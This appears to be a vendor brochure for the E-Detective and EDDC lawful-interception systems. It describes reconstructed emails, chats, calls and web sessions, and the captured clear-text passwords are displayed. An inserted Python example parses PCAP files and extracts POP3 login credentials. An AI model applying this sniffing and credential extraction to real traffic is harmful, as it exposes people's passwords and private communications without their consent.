[Screenshot: NIT home page (tabs HOME | CASE RESULTS | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION; GUI refresh every 24 seconds). Operation Mode: Ethernet LAN Mirror-Sniffer Capture Mode. Case Name: default; Case Name Import ID: ED-2010-01-04 17:39:19; Created By: admin; Created Date: 2009-12-01 23:09:35; Database ID: EDE 1; Raw Data File(s) Reserving Directory: /home/admin/cases/default/; Services and Ports Information; Operation Mode Status: Running (Stop button). A per-interface capture table (Interface, captured time, captured packets, captured packet size, WCS lose packets, drop packets and size, TCP packets and size, UDP packets and size) shows eth0 with 888653 packets (255456 KB) captured, 0 lost, 0 dropped, 163366 TCP and 724398 UDP packets.]

Displays the current operation mode and implementation status.


NIT - Case Results Presentation/Visualization

[Screenshot: top-down view of the Case Results GUI. First level: per-MAC summary table for the selected Raw Data Set ID, one row per source MAC (00:50:7F:29:58:11, 00:24:21:A1:92:7F, 00:1A:80:5C:5B:DE) with record counts per service category (POP3, IMAP, SMTP, webmail, IM, HTTP and others); 3 rows. Second level: drill-down into case "default", MAC 00:24:21:A1:92:7F, category "Webmail (Read)", with the Webmail Token Analyzer option and a Record/Page selector. Columns: No., Date-Time, Account (source IP 192.168.1.11), Sender, Receiver, CC, Subject, Webmail Type (YAHOO2.0 Mail). Sample rows dated 2010-01-04 18:14-18:15 between test accounts wedetective1@yahoo.c..., wedetective2@hotmail... and decision@ed-system.s... with subjects such as "Smart CCTV", "Airshow", "Google", "Test Email", "terrorist" and "2010 Vancouver Olympics costing...".]

Sample: Email (POP3, SMTP, IMAP)

[Screenshot: case "default", MAC 00:24:21:A1:92:7F, category POP3. Columns: No., Date-Time, Account (192.168.1.11), Sender, Receiver, CC, Subject, E-mail Account, Password. The POP3 login name and password captured from each session are stored and displayed in clear text next to the message. Clicking a record opens the reconstructed message in a mail viewer with From, Date (Monday, 4 January, 2010 10:00 AM), To, Subject, Attach (computex2009-1.jpg, 106 KB) and the full body, here a forwarded news article on the FA Cup third round (Leeds United 1-0 Manchester United, Chelsea 5-0 Watford, West Ham 1-2 Arsenal).]


Sample: Webmail (Read and Sent)

[Screenshot: case "default", MAC 00:1A:80:5C:5B:DE, category Webmail (Sent); 2 records. Columns: No., Date-Time (2010-01-04 17:55:25), Account (192.168.1.10), Sender, Password, Receiver, BCC, Subject, Webmail Type (Windows Live). Opening a record loads the decoded message in the browser (URL of the form http://192.168.1.12:888/general/common/decode/mail/openweb.php?...) showing FROM, DATE/TIME, TO and the body text, the same FA Cup article as in the POP3 sample.]

Webmail Type: Yahoo Mail, HTTP Gmail, Windows Live Hotmail, Giga Mail and others.
Only webmail carried over plain HTTP can be reconstructed from a passive capture; a session protected by HTTPS is encrypted end to end and needs a separate interception approach.


Sample: Instant Messaging (Yahoo, MSN etc.)

[Screenshot: case "default", MAC 00:24:21:A1:92:7F, category YAHOO, with a Download Tool link. Columns: No., Date-Time (2010-01-04 18:41:05), Account (192.168.1.11), User Handle (wedetective2), Participants (wedetective1), Conversation Count (13). Opening the conversation (URL of the form http://192.168.1.12:888/general/common/decode/yahoo/yahoo_msg.php?...) lists each message with Date-Time, User Handle, Type, Message text ("hello...", "hi i am fine", "yeyayaya", "thanks", "great") and, for calls, Time Started / Finish Time (e.g. 18:43:10-18:43:49, 19:28:02-19:28:57).]

Yahoo: includes file transfer, webcam and voice call (GIPS decoder required).
MSN: includes file transfer and webcam.


Sample: HTTP Link and HTTP Content

[Screenshot: case "default", MAC 00:1A:80:5C:5B:DE, category HTTP Content. Columns: No., Date-Time, Account (192.168.1.10), Content (page title). Rows 380-397 dated 2010-01-04 20:55-21:10 show a browsing trail: Google, "ISS lawful interception - Google Search", "TeleStrategies' ISS World", TeleStrategies ISS World Asia Pacific and MEA Dubai pages ("Intelligent Support Systems for Lawful Interception, Criminal Investigations and Intelligence Gathering"), AddThis utility frames and ST701. Clicking a record renders the reconstructed page, here the Google results page for "ISS lawful interception" (about 4,980 results, 0.23 seconds) with sponsored links (www.glimmerglass.com, www.amesys.fr) and results for www.issworldtraining.com/ISS_WASH/ and www.issworldtraining.com/ISS_EUROPE/.]


Sample: Social Networking Sites - Facebook

[Screenshot: case "default", MAC C8:0A:A9:F8:08:F1, category FACEBOOK with Wall / Chat / Game filters. Columns: No., Date-Time (2011-08-03 09:57-10:03), Account (192.168.1.2), User Handle (696045329), Content (Profile | Wall, Profile | Photos, wall posts and profile text: employer "Principal Solutions Architect at Decision Group", university, city and birthday), Method (GET); 17 rows shown. A reconstructed wall item: "Frankie Chan likes a link. Player Profesional Nak Pakai Baju Pon Susah | GelakJE! (view.my)" (Malay: "Professional player even has trouble putting on a shirt"), with the comment "Apa yang susah sangat nak pakai baju training tu?? ! HAHA!!" (Malay: "What is so hard about putting on the training shirt?? ! HAHA!!").]


Sample: HTTP Video Streaming (YouTube etc.)

[Screenshot: case "default", MAC 00:24:21:A1:92:7F, category Video Stream; 21 records. Columns: No., Date-Time, Account, Host (YouTube cache hosts such as v16.lscache3.c..., r3.sin2.c.youtu..., v9.lscache6.c.y...), File Name, Size (from 340.99K up to 16.28M). Clicking a record replays the captured stream through the system's Flash player (http://192.168.1.12:888/general/common/decode/http/player.s...), here a clip titled "Hmm...Hacking Other Computers | See?? We'll it could be just that...(for info purposes only)".]


E 
Sample: Voice over IP (VoIP) RTP Calls

[Screenshot: category VOIP; 3 records. Columns: No., Date Time, Account, S. Number, D. Number, Mode, Type, CODEC, VOIP File, Duration (58 sec, 50 sec, 1 min 3 sec). The reconstructed call is offered for download as a WAV file named from the two numbers ("8610044420 8610044421.wav", Wave Sound, 301 KB, from 192.168.1.60), with the browser's usual "files from the Internet can be useful, but some files can potentially harm your computer" prompt.]


Sample: HTTPS Username and Password

[Screenshot: Case Results summary for case "default", Raw Data Set ID N/A, displayed by IP (Display by MAC / IP toggle, Search, Export, Refresh). One row per IP (192.168.6.23, 192.168.6.8, 192.168.1.132, 192.168.1.35, 192.168.1.34, 60.250.163.131, 10.0.0.11, 10.0.0.10) with record counts per category and a row total (e.g. 1254 for 192.168.1.35, 1781 for 192.168.1.34); 8 rows. Drill-down: case "default", IP 192.168.1.35, category Account/password; 6 records. Columns: No., Date-Time (2010-11-07 15:23-15:41), Account (192.168.1.35), User, Password, Server. The rows show logins by the test users bobuuu, wedetective1, wedetective2 and decisiongroup2010 to sign-in URLs at signin.ebay.com.sg/ws/eBayISAPI.dll?co_part..., login.yahoo.com/config/login? and www.google.com/accounts/ServiceLoginAuth, with the submitted passwords listed in clear text.]


Sample: Incomplete Connections

[Screenshot: case "default", MAC 00:24:21:A1:92:7F, category Incomplete Records; 1 record. Columns: No., Date-Time (2010-01-04 18:34:58), Source MAC (00:24:21:A1:92:7F), Source IP (192.168.1.11), Dest. IP (203.175.16236, as shown), S.Port (1973), D.Port (80), Comment ("Lost HTTP Header"), Incomplete Records file (INCOMPLETE_yKJsT9.dat, 4,206 bytes). The file opened in a hex/ASCII binary viewer (proXoft Binary Viewer) shows HTML fragments such as images/stories/module/mapsandbrochures-02.jpg ... height="114" width="140" /></a>, <div style="clear:both;"></div> and <div class="clear"></div>.]

Incomplete connection sessions (here an HTTP response whose request header was not captured, so it could not be assigned to a decoded record) are kept as raw .dat files and can be inspected with a binary/text viewer.

Search - Free Text (Key Words) and Advanced

[Screenshot: Case Results for case "default" with Record/Page selector; per-IP summary rows for 192.168.1.11 and 192.168.1.10 (2 rows); a Free Text (Key Words Search) box.]

Advanced Search (Conditional Search) parameters and search categories:
Date, Time, Source IP, Email Address
FTP Server, FTP User
P2P Tool, P2P File
Game Name
MSN Account (User Handle / Participants)
ICQ Account (User Handle / Participants)


Offline Packet Reconstruction Series
E-Detective Decoding Center
EDDC (for All) & EDDC-LEMF (for LEA)


Introduction to EDDC

* EDDC is a Unix/Linux based system designed for manual offline reconstruction of raw data (PCAP) files.

* It allows the Administrator to create different projects/cases for different users/investigators (with different levels of authority), who then parse the Internet raw data and carry out forensic analysis tasks on the system.

* The system is able to reconstruct Internet applications/services such as Email (POP3, SMTP, IMAP), Webmail (Yahoo Mail, Gmail, Hotmail etc.), IM (Yahoo, MSN, ICQ, QQ, UT, IRC, Google Talk, Skype voice call log), File Transfer (FTP, P2P), HTTP (Link, Content, Reconstruct, Upload/Download, Video Stream), Telnet, Online Games, VoIP (Yahoo), Webcam (Yahoo, MSN).

* EDDC can be used by any group of users who wish to view the content of network traffic from pre-captured raw data files. It is designed for private and public sector users.

User/Case Management - Offline Internet Raw Data Parser/Reconstruction - Search Function - Export/Backup


EDDC Application and Implementation Diagram

[Diagram: offline raw data decoding and reconstruction system with user and case management. Investigator 1 collects and imports raw data for Case 1 into EDDC/XDDC and receives the Case 1 results; Investigator 2 does the same for Case 2 and receives the Case 2 results. The system reconstructs the various Internet protocols/service types.]


Introduction to EDDC-LEMF (1)

* A lawful interception solution for parsing PCAP files or raw packet data streams from front-end mediation platforms or broadband service routers.

* Decodes all data packets associated with a protocol based on service port number and session. Because classification is by port, a service running on a non-standard port is not decoded and ends up in the un-decoded output.

* Saves un-decoded data into a specified directory in PCAP format.

* Outputs decoded data into a database, with the associated multimedia files and XML files laid out in a predefined way.

* Compliance with ETSI TS 101 671 and ETSI ES 201 671.


Introduction to EDDC-LEMF (2)

* Input data will be:
  - XML description file and PCAP files
  - Data stream (must be specified in advance)
* All output data is saved and processed by case ID.
* FTP server and client services are launched.
* Case management interface.
* Law enforcement management utility for cyber investigation (LEMF; in the ETSI specifications LEMF stands for Law Enforcement Monitoring Facility, the endpoint that receives the handover interface output).
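The offline reconstruction described for EDDC and the port-and-session based decoding described for EDDC-LEMF, as one added example that is not EDDC code: a minimal reader for classic libpcap files that reassembles each TCP direction by sequence number (dropping retransmitted bytes), classifies the flow by service port, and pulls the POP3 USER/PASS exchange out of the client stream. The capture is constructed inside the script (frame builder, addresses, credentials), the port table is an assumption, and real traffic would also need IPv6, VLAN tags, TCP gap handling and the many application decoders the product lists.

```python
import struct
from collections import defaultdict

# Added example (not EDDC code): minimal offline PCAP reader that reassembles each TCP
# direction into a byte stream, classifies it by service port and pulls POP3 logins out of it.
# The port table and the capture below are assumptions made for the example.

SERVICE_PORTS = {21: "FTP", 23: "TELNET", 25: "SMTP", 80: "HTTP", 110: "POP3", 143: "IMAP"}


def _ip2b(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def _b2ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_frame(src_ip, dst_ip, sport, dport, seq, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame (PSH|ACK). Checksums are left zero; the reader does not verify them."""
    eth = bytes.fromhex("002421a1927f001a805c5bde0800")           # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0, 64, 6, 0,
                     _ip2b(src_ip), _ip2b(dst_ip))
    return eth + ip + tcp + payload


def build_pcap(frames) -> bytes:
    """Wrap frames in a classic libpcap file (magic 0xa1b2c3d4, link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1262600000 + i, 0, len(frame), len(frame)) + frame
    return out


def parse_pcap(data: bytes) -> dict:
    """Return {(src, sport, dst, dport): reassembled payload} for every TCP direction in the file.
    Segments are ordered by sequence number; retransmitted or overlapping bytes are dropped."""
    (magic,) = struct.unpack("<I", data[:4])
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("only Ethernet link type is handled")
    segments = defaultdict(list)
    off = 24
    while off + 16 <= len(data):
        _, _, caplen, _ = struct.unpack(endian + "IIII", data[off:off + 16])
        pkt = data[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(pkt) < 34 or pkt[12:14] != b"\x08\x00":
            continue                                   # not IPv4
        ip = pkt[14:]
        ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:
            continue                                   # not TCP
        tcp = ip[ihl:total_len]
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            segments[(_b2ip(ip[12:16]), sport, _b2ip(ip[16:20]), dport)].append((seq, payload))
    flows = {}
    for key, segs in segments.items():
        segs.sort(key=lambda s: s[0])
        buf, expected = bytearray(), None
        for seq, payload in segs:
            if expected is not None and seq < expected:
                payload = payload[expected - seq:]    # retransmission or overlap: keep new bytes only
                seq = expected
            if not payload:
                continue
            buf += payload
            expected = seq + len(payload)
        flows[key] = bytes(buf)
    return flows


def classify(key) -> str:
    """Port-based service classification. Anything unmatched is 'UNDECODED' and would be kept as raw PCAP."""
    _, sport, _, dport = key
    return SERVICE_PORTS.get(dport) or SERVICE_PORTS.get(sport) or "UNDECODED"


def extract_pop3_credentials(flows) -> list:
    """USER/PASS pairs from client->server POP3 streams (what fills the 'Account password' column)."""
    found = []
    for key, stream in flows.items():
        if key[3] != 110:
            continue
        user = None
        for line in stream.split(b"\r\n"):
            verb, _, arg = line.partition(b" ")
            if verb.upper() == b"USER":
                user = arg.decode(errors="replace")
            elif verb.upper() == b"PASS" and user is not None:
                found.append((key[0], user, arg.decode(errors="replace")))
                user = None
    return found


def demo_capture() -> bytes:
    """Constructed POP3 login: client segments (one retransmitted) and server replies; nothing here is real."""
    c, s = "192.168.1.11", "203.0.113.5"
    frames = [build_frame(c, s, 40001, 110, 1000, b"USER alice\r\n"),
              build_frame(s, c, 110, 40001, 5000, b"+OK\r\n"),
              build_frame(c, s, 40001, 110, 1012, b"PASS s3cret\r\n"),
              build_frame(c, s, 40001, 110, 1012, b"PASS s3cret\r\n"),   # duplicate (retransmission)
              build_frame(s, c, 110, 40001, 5005, b"+OK Logged in.\r\n")]
    return build_pcap(frames)


if __name__ == "__main__":
    flows = parse_pcap(demo_capture())
    for key in flows:
        print(classify(key), key)
    print(extract_pop3_credentials(flows))
```

Reassembling before decoding matters: a decoder that looks at packets one at a time would see the retransmitted PASS line twice, and a USER line split across two segments would be missed entirely. Flows classified as UNDECODED are exactly what the LEMF description says is written back out as PCAP for later analysis.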


Implementation of EDDC-LEMF

[Diagram: a telecom, international gateway station or ISP feeds traffic over optic fiber into a mediation platform; the mediation platform (optionally sending an XML description) delivers XML description files and PCAP files to the ED/LEMF system; multiple ED/LEMFs are managed by a Data Retention Management System, with an optional Analysis Server (Data Mining).
1. Connection (mediation platform to ED/LEMF): directory tree, file name convention, XML description file, PCAP file upload.
2. System: FTP with the mediation platform, case ID management, web-based law enforcement management utilities and system administration, user manual.
3. Connection (to the management/analysis side): FTP.]


EDDC Dashboard/Homepage

[Screenshot: EDDC web GUI logged in as admin. Menu: Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout; Case Name: default; Raw Data Import Filter: N/A; Import Record; Build Backup ISO. Category tabs: REPORT, E-MAIL, CHAT, FILE TRANSFER, GAME, HTTP, TELNET, VOIP, SSL, FUNCTION. Report types: Total Throughput Statistical Report, Top-Down View Report, Online User List (generated 2009-06-18 18:34:31). Throughput table per service category (Summary, POP3, IMAP, SMTP, Webmail (Read), File Transfer, ...) with Daily (2009-06-18), Weekly (2009-06-11 ~ 2009-06-18) and Total quantity/throughput, e.g. Summary: 222 records / 93,341 KB daily, 250 / 93,700 KB weekly, 13,951 / 390,555 KB total; POP3: 66 records / 16,043 KB total. User "All Traffic Top n" table per account IP (192.168.1.142: 115,532 KB; 192.168.1.33: 102,766 KB; 192.168.1.10: 96,256 KB; 192.168.1.11: 32,401 KB; 192.168.1.9: 31,845 KB; 192.168.1.179: 9,905 KB; 192.168.1.132: 951 KB; 192.168.10.10: 359 KB; 192.168.1.13: 284 KB; 66.94.230.122: 210 KB; 68.142.233.22: 46 KB; several at 0 KB), each with a "Who is ?" lookup and Protocol / Daily / Weekly / Summary links.]


Sample Reconstruction: Email (POP3)

[Screenshot: EDDC Case Results, E-MAIL tab, POP3, page 5 of the result set. Columns: No., Date-Time (2008-07-02 10:28:43), Account (192.168.1.11), Sender, Receiver, CC, Subject, Login, Password; the POP3 login (support@e...) and its password are listed against every message retrieved in that session. A selected record opens in a pop-up window (https://192.168.1.12/general/common/show_msg.php?...) with the decoded message: subject "Brazil's new drunken driving law stirs discontent", date 2008-07-02 18:24:04, followed by the article body (Brazil's new drink-driving law: limit lowered from 0.6 to 0.2 decigrammes of alcohol per litre of blood, fines of at least US$600, one-year licence suspension, some 300 motorists arrested in the first 10 days).]


Sample Reconstruction: Email (SMTP)

[Screenshot: E-MAIL tab, SMTP; 19 records over 2 pages. Columns: No., Date-Time, Account, Sender, Receiver, CC, BCC, Subject, Login, Password (N/A for these records). Senders at decision.com.tw, ed-system.sg and 163.com; several subjects are in Chinese. An attachment of the selected message is offered for download (f742578d0c3e6b94.doc, Microsoft Office Word 97-2003 Document, from 192.168.1.12) and the message body is rendered, here a news article "New York City restaurants go trans-fat-free" about the city's ban on artificial trans-fats in restaurants and the grace period before fines of up to US$2,000.]


Sample Reconstruction: Webmail (Read)

[Screenshot: E-MAIL tab, Webmail (Read), with the Webmail Token Analyzer option; 88 records over 9 pages, page 8 shown. Columns: No., Date-Time (2008-07-02 10:21-10:26), Account (192.168.1.11 / 192.168.1.1), Sender, Receiver, CC, Subject, Webmail Type (GMail, Windows Live, YAHOO2.0 Mail). Subjects include "pics for you to smile", "Human genome changes with age", "FW: Auditing Tool", "Brazil's new drunken driving law stirs discontent" and "Fw: Qatar Airways to increase flights". The selected record shows the decoded message: FROM registration@youtubeclipextractor.com, DATE/TIME 2008-07-02 10:21:12, TO fransyinmy@yahoo.com, SUBJECT "Your YouTube Clip Extractor registration", with the registration/activation text from the YouTube Clip Extractor team (http://www.YouTubeClipExtractor.com).]


Sample Reconstruction: Webmail (Sent) 


[Screenshot: E-Detective web console, case "default", tab E-MAIL > Webmail (Sent). Same menu bar and category tabs as the previous sample.]

Listing columns: No. | Date-Time | Account | Sender | Password | Receiver | CC | BCC | Subject | Webmail Type
(The Password column holds the webmail login password recovered from the captured session.)
Legible rows (all dated 2008-07-02):
    --  (time illegible)  192.168.1.10  vic@decision...  Fw: FW ...  HiNet Mail
    --  10:28:17  192.168.1.11  decision@gma...  decision@ed-...  Bush  GMail
    84  (time illegible)  192.168.1.11  support@ed-s...  UN finds world economic insecurity ...  GMail
    --  10:25:28  192.168.1.11  edetective2@hotmail...  support@ed-s...  Windows Live
    19  (time illegible)  192.168.1.11  frankie.deci...  N agency hails green energy 'gold ...  Windows Live
    --  10:22:16  fransyinmy@yahoo.com  ... Irish mi...  YAHOO2.0 Mail
Pager: Total Page 2, Current Page 2.

Detail pane for message 84:
    FROM: frankie.decision@gmail.com
    DATE / TIME: 2008-07-02 10:27:24
    TO: support@ed-system.sg
    SUBJECT: UN finds world economic insecurity among rich, poor
    ATTACHMENT: 1 (SIA.jpg; the overlaid File Download dialog shows Type: JPEG Image, 23.2KB, From: 192.168.1.12, with Open / Save / Cancel)
    Body: forwarded AP article beginning "UNITED NATIONS - RICH and poor nations have more in common this year: a growing sense of economic insecurity. Their shared anxiety is largely due to 'trade shocks' from rising oil and food prices, rattled financial markets, natural disasters and armed conflicts, the UN said in its annual survey of world economic and social trends, released on Tuesday." (article text continues; the reconstructed page is shown in Internet Explorer, Protected Mode: Off)


Sample Reconstruction: IM - MSN 


[Screenshot: E-Detective web console, case "default", tab CHAT > MSN. Menu bar: Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout.]

Listing columns: No. | Date-Time | Account | User Handle | Participants | Conversation | Count
    5  192.168.1.33  shmily.d0613@msa.hinet.net  diesis@ms62.hinet.net     Conversation  48
    4  192.168.1.33  shmily.d0613@msa.hinet.net  philip12129@hotmail.com   Conversation  12
    3  192.168.1.33  shmily.d0613@msa.hinet.net  dick691111@yahoo.com.tw   Conversation  28
    2  192.168.1.13  wedetective@hotmail.com     wedetective2@hotmail.com  Conversation  (illegible)
    1  192.168.1.11  wedetective2@hotmail.com    wedetective@hotmail.com   Conversation  9
Pager: Total Page 3, Current Page 3.

Conversation window (https://192.168.1.12/general/common/show_msg.php?PROG=msn/msn_msg.php&IDX=1&...), wedetective2@hotmail.com - wedetective@hotmail.com, Date-Time 2008-07-02 10:43:23, User Handle wedetective2@hotmail.com:
    Columns: Date-Time | User Handle | Message
    wedetective2@hotmail.com  helo
    wedetective2@hotmail.com  how r u?
    wedetective@hotmail.com   hi
    wedetective@hotmail.com   I am fine
    wedetective@hotmail.com   thanks!
    2008-07-02 10:43:54  wedetective2@hotmail.com  (file transfer, 68.7K)
    wedetective2@hotmail.com  (file transfer, 213.2K)
    2008-07-02 10:44:46  (illegible)
    Pager: Total 9, Total Page 2, Current Page 1. A lower panel lists transferred files (File Name | File Size).


Sample Reconstruction: IM - YAHOO 


[Screenshot: E-Detective web console, case "default", tab CHAT > YAHOO, with a "Download Tool" button above the list.]

Listing columns: No. | Date-Time | Account | User Handle | Participants | Conversation | Count
    9  2008-09-22 09:40:13  192.168.1.9    superuserdemo  diesis2k5              Conversation
    8  2008-09-22 09:40:13  192.168.1.10   diesis2k5      superuserdemo          Conversation
    7  2008-09-22 09:15:36  192.168.1.10   diesis2k5      test3@decision.com.tw  Conversation
    6  2008-07-02 10:41:50  68.142.233.22  wedetective1   wedetective2           Conversation
    5  2008-07-02 10:41:36  68.142.233.22  wedetective2   wedetective1           Conversation
    4  2008-07-02 10:40:51  66.94.230.122  wedetective1   wedetective2           Conversation
    3  2008-07-02 10:40:42  66.94.230.122  wedetective2   wedetective1           Conversation
    2  2008-07-02 10:40:06  192.168.1.11   wedetective1   wedetective2           Conversation  15
    1  2008-07-02 10:40:05  192.168.1.13   wedetective2   wedetective1           Conversation  15
Pager: Total Page 1, Current Page 1.

Conversation window (https://192.168.1.12/general/common/show_msg.php?PROG=yahoo/yahoo_msg.php&IDX=2&...), Date-Time 2008-07-02 10:40:06, User Handle wedetective1:
    Columns: No. | Date-Time | User Handle | Type | Message / Time Started / Finish Time
    Entries: wedetective2 Message "good morning"; wedetective1 Message "I'm fine"; wedetective1 Message "thank you"; wedetective1 File (...Request Form.pdf); wedetective1 Message "thank you!!!"; wedetective2 Message "welcome"; followed by Video and Audio session records with start and finish times.


Sample Reconstruction: File Transfer (FTP) 


[Screenshot: E-Detective web console, case "default", tab FILE TRANSFER > FTP.]

Listing columns: No. | Date-Time | Account | Username | Password | Action | FTP Server IP | File Name
(FTP transmits the login in clear text, so the username and password used for each transfer are recorded next to the file name.)
    5  2008-07-02  192.168.1.10  vic        vic      Download  192.168.1.249  Cisco Icons 1.ppt
    4  2008-07-02  192.168.1.11  anonymous  IEUser@  Download  64.7.210.151   DWA-642_ds.pdf
    3  2008-07-02  192.168.1.11  anonymous  IEUser@  Download  64.7.210.151   DSN-3200-10_ds.pdf
    2, 1  (illegible)
Pager: Current Page 3.

Overlay: Internet Explorer window https://192.168.1.12/general/common/download... with a File Download dialog (Name: DWA-642_ds.pdf, Type: Adobe PDF Reader, 594KB, From: 192.168.1.12; Open / Save / Cancel) and the reconstructed PDF behind it: the D-Link RangeBooster N Notebook CardBus Adapter (DWA-642) datasheet, sections "Exceptional Performance", "Get Connected, Stay Connected" and "Easy to Setup, Easy to Use" (draft 802.11n client, backward compatible with 802.11g, WPA/WPA2 support).


Sample : File Transfer (P2P File Sharing Log) 


[Screenshot: E-Detective web console, case "default", tab FILE TRANSFER > P2P.]

Listing columns: No | Date-Time | Account | Tool | File Name | Last Activated | Send Throughput | Receive Throughput | Detail
    12  2009-06-18 12:10:56  192.168.1.142  Foxy 1.9.8.0  04.Hero - Mariah Carey.mp3...          2009-06-18 12:10:56  0B  1.90K   Detail
    11  2008-09-22 09:56:50  192.168.1.142  Foxy 1.9.8.0  (Chinese title) ... Hero ...           2008-09-22 09:58:42  0B  5.26M   Detail
    10  2008-09-22 09:56:24  192.168.1.142  Foxy 1.9.8.0  ...-Hero-Mariah Carey.mp3              2008-09-22 09:59:56  0B  8.58M   Detail
     9  2008-09-22 (illegible)  192.168.1.142  Foxy 1.9.8.0  ...Can You Keep A Secret...         2008-09-22 09:57:03  0B  6.42?   Detail
     8  (illegible)          192.168.1.10   Foxy 1.9.8.0  (Chinese title)                        (illegible)  4.63M  0B      Detail
     7  2008-09-22 09:39:31  192.168.1.142  BitTorrent    (illegible)                            (illegible)  ...    ...07M  Detail
     6  2008-09-22 09:38:12  192.168.1.142  BitTorrent    (illegible)                            (illegible)  ...    13K     Detail
     5  (illegible)          192.168.1.10   Foxy 1.9.8...                                                     ...    21M     Detail
     4  2008-09-22 09:55:01  192.168.1.10   Foxy 1.9.8...                                                     ...    11M     Detail
     3  2008-09-22 09:54:13  192.168.1.33   Foxy 1.9.8...                                                     ...    31K     Detail
Pager: Current Page 1.

Detail popup (https://192.168.1.12/general/common/show_msg.php?PROG=...msg.php&IDX=10&...): Date-Time 2008-09-22 09:56:24 | IP 192.168.1.142 | File Name ...-Hero-Mariah Carey.mp3
    Columns: No | Date-Time | Action | P2P IP | Port | P-Port | Bytes
    1  2008-09-22 09:56:24  Download  122.124.6.143    51573  6407   491B
    2  2008-09-22 09:56:24  Download  122.124.6.143    51576  6407   492B
    3  2008-09-22 09:56:24  Download  118.161.244.30   51579  11243  545B
    4  2008-09-22 09:56:24  Download  59.125.156.64    51578  6019   3.29K
    5  2008-09-22 09:56:46  Download  61.59.238.168    51615  6503   479B
    6  2008-09-22 09:56:50  Download  118.161.209.155  51612  4901   523.23K
    7  2008-09-22 09:57:04  Download  60.250.100.76    51635  9446   515.31K
    8  2008-09-22 09:57:04  Download  203.222.42.58    51680  5081   512.50K
    9  2008-09-22 09:57:08  Download  61.229.222.3     51685  5751   950B
    Pager: Total 24, Total Page 3, Current Page 1.


Sample : HTTP (Web Reconstruct) 


[Screenshot: E-Detective web console, case "default", tab HTTP (Web Reconstruct).]

Listing columns: No. | Date-Time | Account | Content
    549  2009-06-18 12:22:36  192.168.1.11  http://www.dlink.com.sg/support/support_detail.asp
    548  2009-06-18 12:22:24  192.168.1.11  http://www.dlink.com.sg/support
    547  2009-06-18 12:21:24  192.168.1.11  http://sg.news.yahoo.com/ap/20090618/twl-brazil-plane-1be00ca.html
    546  2009-06-18 12:12:11  192.168.1.11  http://ads.yimg.com/hb/i/sg/adv/test/sg_m_ysm_iframe_2008090...
    545  2009-06-18 12:12:10  192.168.1.11  http://sg.news.yahoo.com/afp/20090617/tap-entertainment-sing...
    544-540  2009-06-18 12:11:42 to 12:12:02  (URLs illegible)
Pager: Total 549, Total Page 55, Current Page 1.

Reconstruction window (https://192.168.1.12/general/common/show_msg.php?PROG=http/dynamic_msg.php&...) renders entry 547 as the Yahoo! News page "Autopsies suggest Air France jet broke up in sky" (AP, Thursday June 18, by Stan Lehman and Emma Vandore, datelined SAO PAULO: autopsies revealed fractures in the legs, hips and arms of the victims, which together with the large pieces of wreckage pulled from the Atlantic strongly suggest the plane broke up in the air), complete with the "Most Popular - World" sidebar, search box and advertisement iframe.


Sample : HTTP (Download/Upload) 


[Screenshot: E-Detective web console, case "default", tab HTTP (Download/Upload).]

Listing columns: No. | Date-Time | Account | Action | File Name | File Type | URL | File Size
    224  2008-09-22 09:19:06  192.168.1.9   Download  flower.zip        zip  http://c.icq.com/xtraz2/img/flower/flower.zip          4.04K
    223  2008-09-22 (illegible)  192.168.1.9   Download  avatar.zip     zip  http://c.icq.com/xtraz2/img/avatar/avatar.zip          4.50K
    222  2008-09-22 (illegible)  192.168.1.9   Download  backgammon.zip zip  http://c.icq.com/xtraz2/img/backgammon/backgammon.zip  5.57K
    221  2008-09-22 09:18:39  192.168.1.10  Upload    60X160_01_PP.jpg  jpg  http://webmail.seed.net.tw/UploadAttachment.do?webmailkey=20...  414.53K
    220  2008-09-22 09:18:39  192.168.1.10  Upload    60X160_01_PP.jpg  jpg  http://webmail.seed.net.tw/UploadAttachment.do?webmailkey=20...  0B
    219  2008-09-22 (illegible)  192.168.1.10  Upload  60X160...         ...  http://webmail.seed.net.tw/UploadAttachment.do?...  53B
    218  2008-09-22 09:18:39  (illegible)   Download  60X160...         ...  ...UploadAttachment.do?...  0B
    217  2008-09-22 09:18:39  (illegible)   ...       60X160...         ...  ...UploadAttachment.do?...  0B
Pager: pages 9-14 shown, Total 320, Total Page 40, Current Page 13.

Overlay: File Download dialog for a JPEG image (Open / Save / Cancel) with the usual Internet Explorer warning text.


Sample: HTTP (FLV Video Streaming) 


[Screenshot: E-Detective web console, case "default", tab HTTP > Video Stream.]

Listing columns: No. | Date-Time | Account | HOST | File Name | URL | File Size
    352  2009-06-18 12:10:56  192.168.10.10  v.mccont.com   HTTPVIDEO_Ir2IpB.flv               http://v.mccont.com/ItemFiles/%5BFrom%20www.metacafe.com%5D%...   589.30K
    351  2008-09-22 10:06:07  192.168.1.33   203.66.48.101  HTTPVIDEO_kjeXsc.flv               http://203.66.48.101/youtube/4/Go2Fg4xSE2c?ivit=9196&origina...    1.00M
    350  2008-09-22 10:06:07  192.168.1.33   youtube.com    Gnomish engineer underwater ro...  http://tw.youtube.com/watch?v=Go2Fg4xSE2c&feature=related          1.00M
     --  2008-09-22 09:48:54  192.168.1.33   203.66.48.36   HTTPVIDEO_QgNOZE.flv               http://203.66.48.36/youtube/1/X3_VPQhlyno?ivit=8149&original...    2.60M
